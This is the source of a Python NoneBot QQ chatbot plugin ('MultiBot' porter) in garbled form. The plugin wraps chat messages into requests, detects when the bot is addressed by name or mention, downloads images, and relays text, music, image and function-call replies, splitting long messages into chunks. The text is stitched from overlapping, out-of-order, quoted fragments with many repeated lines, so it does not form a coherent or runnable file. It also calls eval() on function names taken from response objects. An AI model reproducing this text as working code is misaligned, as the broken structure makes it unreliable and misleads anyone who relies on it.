初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img:", "for sign in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if", "Distributor from ....utils import image_url_to_path from ....paths import PATHS import os, logging, traceback", "# BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session:", "name in text: # 被叫到时 bot_called = True text = text.strip() while text[:len(name)]", "msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg)", "nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed nonebot porter ==========')", "= text elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img", "text = message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in text:", "[MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed nonebot", "save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return", "2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length]", "distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========')", "logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed", "BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession):", "在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id", "= True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called", "only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async", "except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc())", "text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign in", "'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔',", "bot_called = True for message in session.ctx['message']: if message['type'] == 'text' and request.msg", "request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor", "self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('===========", "% str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left =", "'子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left", "'请使用' in text and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"'", "for message in session.ctx['message']: if message['type'] == 'text' and request.msg is None: text", "session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时", "isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg", "',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in text and", "text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if", "= os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']),", "Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id)", "# 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg)", "# 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] ==", "....responses import * from ....distributor import Distributor from ....utils import image_url_to_path from ....paths", "# 被叫到时 bot_called = True text = text.strip() while text[:len(name)] == name: text", "not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\"", "text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo =", "is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif", "= ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id ==", "in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']:", "request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '': request.msg", "image_url_to_path from ....paths import PATHS import os, logging, traceback # BLACKLIST = [3288849221]", "else: # 私聊时 bot_called = True for message in session.ctx['message']: if message['type'] ==", "'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter", "if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try:", "text != '': request.msg = text elif message['type'] == 'image' and request.img is", "Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called =", "'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\"", "= [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return", "name in self_names: if name in text: # 被叫到时 bot_called = True text", "== 'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for name", "# 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request)", "and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] ==", "request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in", "session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误')", "session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message in", "else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg", "Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform =", "None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type']", "session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id'])", "request.msg = text elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载", "elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号", "....distributor import Distributor from ....utils import image_url_to_path from ....paths import PATHS import os,", "# 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await", "= True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text !=", "and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for name in self_names:", "'': request.msg = text elif message['type'] == 'image' and request.img is None: #", "= str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False", "at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000", "if '请使用' in text and '新版手机QQ' in text: request.echo = True request.msg =", "= image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud =", "response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text", "None]: text = text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in", "response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for response", "过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分", "str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if", "!= '': request.msg = text elif message['type'] == 'image' and request.img is None:", "from nonebot import CommandSession, on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests", "# 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request,", "text[-len(name):] == name: text = text[:-len(name)] for sign in [None, ',', ',', None]:", "'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue", "# 这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic): await", "'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for name in", "if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses())", "'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot", "list): for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg", "request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text", "Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot", "try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name)", "msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg):", "= [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message':", "text continue # 空文本检测 if text != '': request.msg = text elif message['type']", "from ....responses import * from ....distributor import Distributor from ....utils import image_url_to_path from", "....paths import PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST =", "用于执行Response序列 async def execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg)", "ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' %", "request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def", "= True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor =", "await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await", "allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def", "# 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else:", "= '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id,", "response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id", "in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测", "porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========')", "async def execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg) or", "await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await", "不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息", "= 2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg =", "from ....paths import PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST", "'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心", "str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called", "....utils import image_url_to_path from ....paths import PATHS import os, logging, traceback # BLACKLIST", "return response_list # 用于执行Response序列 async def execute(response_list: list): for response in response_list: try:", "isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg", "[MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left", "if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id", "[None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in text", "isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output", "text elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img =", "await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left else:", "Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed nonebot porter", "== self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST:", "ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output =", "NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot]", "import on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses import * from", "elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not", "message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is", "await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left", "True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called =", "f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def", "text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name: text", "self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id", "import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False,", "@on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter')", "TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) #", "# Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id =", "import image_url_to_path from ....paths import PATHS import os, logging, traceback # BLACKLIST =", "execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot", "if msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg = ''", "execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg):", "PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False,", "= str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message in session.ctx['message']: if", "response_list # 用于执行Response序列 async def execute(response_list: list): for response in response_list: try: if", "def execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response,", "from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses import", "IntentCommand from ....requests import Request from ....responses import * from ....distributor import Distributor", "in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id =", "= True for message in session.ctx['message']: if message['type'] == 'text' and request.msg is", "max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg", "这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]')", "'[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left", "def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list", "# msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await", "# 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg =", "text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)]", "logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request()", "if text != '': request.msg = text elif message['type'] == 'image' and request.img", "porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request", "request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names", "isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s'", "= {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share',", "= Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list", "elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id)", "= '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg):", "await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列", "continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img", "BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: #", "= text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo", "def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession):", "# msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await", "msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response,", "# 私聊时 bot_called = True for message in session.ctx['message']: if message['type'] == 'text'", "呼叫检测 for name in self_names: if name in text: # 被叫到时 bot_called =", "_(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('===========", "import Request from ....responses import * from ....distributor import Distributor from ....utils import", "request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx',", "message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in text: # 被叫到时", "elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await", "msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊", "logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async", "= message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud", "None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc =", "BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter',", "# request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None:", "message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in", "str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题", "else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called:", "isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\')", "\\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses():", "session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except", "需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else:", "msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) >", "CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request =", "session.ctx['message']: if message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip() #", "== name: text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for", "!= '': # 这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response,", "name: text = text[:-len(name)] for sign in [None, ',', ',', None]: text =", "= response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送", "符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot]", "==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id'", "str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message in session.ctx['message']: if message['type']", "'小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter", "私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '':", "while text[-len(name):] == name: text = text[:-len(name)] for sign in [None, ',', ',',", "message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type']", "sign in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用'", "['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id:", "in text and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' %", "递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses())", "in text: # 被叫到时 bot_called = True text = text.strip() while text[:len(name)] ==", "text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign in [None, ',',", "= distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for response in", "# 空文本检测 if text != '': request.msg = text elif message['type'] == 'image'", "True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor()", "response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg)", "ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id)", "await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': #", "image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'],", "'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif", "text = text[:-len(name)] for sign in [None, ',', ',', None]: text = text.strip(sign)", "response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await", "= await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError:", "from ....utils import image_url_to_path from ....paths import PATHS import os, logging, traceback #", "msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else:", "elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':',", "else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot]", "or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]'", "> 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if", "ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if", "IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot", "import * from ....distributor import Distributor from ....utils import image_url_to_path from ....paths import", "==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id =", "async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 #", "is None: text = message['data']['text'].strip() # 呼叫检测 for name in self_names: if name", "# 用于执行Response序列 async def execute(response_list: list): for response in response_list: try: if isinstance(response,", "ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg +=", "message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg =", "len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分", "NLPSession, IntentCommand from ....requests import Request from ....responses import * from ....distributor import", "nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ'", "nonebot import CommandSession, on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import", "if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg)", "message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for", "request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ 